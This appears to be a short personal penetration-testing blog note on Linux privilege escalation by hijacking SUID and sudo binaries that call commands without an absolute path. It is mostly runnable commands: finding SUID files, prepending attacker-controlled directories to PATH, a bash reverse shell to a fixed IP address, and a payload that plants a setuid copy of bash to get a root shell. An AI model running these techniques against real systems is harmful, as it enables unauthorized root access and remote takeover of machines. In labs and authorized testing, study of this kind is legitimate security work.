find the suid file

1	`find / -perm -4000 2>/dev/null`

if it was in the list of GTFObins
https://gtfobins.github.io/
so excute command follow GTFObins,if it not in the list.
use follow ways

Sudo command/SUID binary without command path

sudo:
If the sudo permission is given to a single command without specifying the path: hacker10 ALL= (root) less you can exploit it by changing the PATH variable

1
2
3

export PATH=/tmp:$PATH
#Put your backdoor in /tmp and name it "less"
sudo less

suid:
using strings to check the suid file

strings reset_pass 
···
echo john:john | chpasswd
···

in this binary file, it dont specify the command path,so we could inject the path

1	`export PATH=$(pwd):$PATH`

check the PATH

1 2	`echo $PATH /home/john:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin`

and move the bound reverse-shell into this path(/home/john) and name it chpasswd(remember add x to the file)
bound reverse-shell

1 2	`#!/bin/bash bash -i >& /dev/tcp/192.168.166.195/80 0>&1`

and excute the suid binary file.
or we could add a suid bash file

1 2	`echo -ne '#!/bin/bash\ncp /bin/bash /dev/shm/bash\nchmod 4775 /dev/shm/bash'> chpasswd chmod 777 chpasswd`

1	`/dev/shm/bash -p`

if i meet new situation, i will update the article.

Hijacking Relative Paths in SUID Programs | by Nairuz Abulhul | R3d Buck3T | Medium

Linux Privilege Escalation | HackTricks | HackTricks

SUID | SGID Part-2 – Linux Privilege Escalation

note Linux

#penetrate #Linux

SUID,SUDO binary hijack

https://rightevil.github.io/SUID,SUDO-binary-hijack/

作者

rightevil

发布于

2024年3月12日

许可协议

vulnhub-wp djinn 上一篇

SMB,SMTP,SNMP enum 下一篇

SUID,SUDO binary hijack

find the suid file

Sudo command/SUID binary without command path

recommend blog or material